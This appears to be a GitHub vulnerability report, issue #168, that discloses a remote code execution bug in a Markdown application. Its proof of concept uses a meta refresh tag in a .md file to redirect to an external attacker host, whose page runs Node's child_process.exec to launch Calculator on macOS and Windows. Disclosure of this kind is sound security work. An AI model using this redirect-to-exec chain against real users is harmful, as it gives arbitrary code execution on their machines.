RCE Vulnerabilities via meta redirect

```
Author: bob11.devranger@gmail.com
OS: macOS 
Version: 7.1.5
```

## Summary
It has been possible to trigger Remote Code Execution via meta redirect

## Description
When you open the .md file containing the mata tag, the meta tag is applied and the location can be moved to the hacker server via meta redirect.

[macOS]
file content
```
<meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/a.html"></meta>
```
```html

<script>
	require('child_process').exec('open -a /System/Applications/Calculator.app')
</script>
```
<img width="932" alt="image" src="https://user-images.githubusercontent.com/66944342/201728795-c4ace076-0cf9-4b89-9ae2-49f90859c07b.png">



[Windows]
file content
```
<meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/b.html"></meta>
```
```html

<script>
	require('child_process').exec('calc')
</script>
```
<img width="1680" alt="image" src="https://user-images.githubusercontent.com/66944342/201728707-80c34782-3350-402a-9ce1-16be6dff96d9.png">

## PoC
https://drive.google.com/file/d/1pEjEgBIuv2-cWw9is5bG8BeqC5ngfsnA/view?usp=sharing

## What’s More?
* if you have any problems, contact me via [[bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)]
* Thank You!

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

RCE Vulnerabilities via meta redirect #168

Summary

Description

PoC

What’s More?

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

RCE Vulnerabilities via meta redirect #168

Description

Summary

Description

PoC

What’s More?

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions